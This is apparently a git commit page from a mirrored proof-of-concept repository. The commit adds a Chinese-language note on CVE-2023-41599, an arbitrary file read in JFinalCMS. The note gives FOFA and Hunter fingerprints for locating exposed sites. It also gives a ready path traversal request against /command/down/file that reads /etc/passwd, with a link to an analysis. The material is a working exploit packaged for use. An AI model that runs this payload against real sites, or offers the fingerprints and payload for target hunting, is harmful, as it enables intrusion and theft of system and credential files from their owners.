mirror of
https://github.com/wooluo/POC00.git
synced 2026-07-24 21:45:34 +08:00
Create JFinalCMS 任意文件读取漏洞(CVE-2023-41599).md
This commit is contained in:
23
JFinalCMS 任意文件读取漏洞(CVE-2023-41599).md
Normal file
23
JFinalCMS 任意文件读取漏洞(CVE-2023-41599).md
Normal file
@@ -0,0 +1,23 @@
|
|||||||
|
## JFinalCMS 任意文件读取漏洞(CVE-2023-41599)
|
||||||
|
|
||||||
|
|
||||||
|
## 特征
|
||||||
|
```fofa:
|
||||||
|
|
||||||
|
body="content=\"JreCms"
|
||||||
|
|
||||||
|
hunter:
|
||||||
|
|
||||||
|
web.body="content=\"JreCms"
|
||||||
|
```
|
||||||
|
## POC
|
||||||
|
```
|
||||||
|
Windows: /../../../../../../../../../test.txt
|
||||||
|
Linux: /../../../../../../../../../etc/passwd
|
||||||
|
|
||||||
|
/command/down/file?filekey=/../../../../../../../../../etc/passwd
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## 漏洞分析
|
||||||
|
http://www.so1lupus.ltd/2023/08/28/Directory-traversal-in-JFinalCMS/
|
||||||
Reference in New Issue
Block a user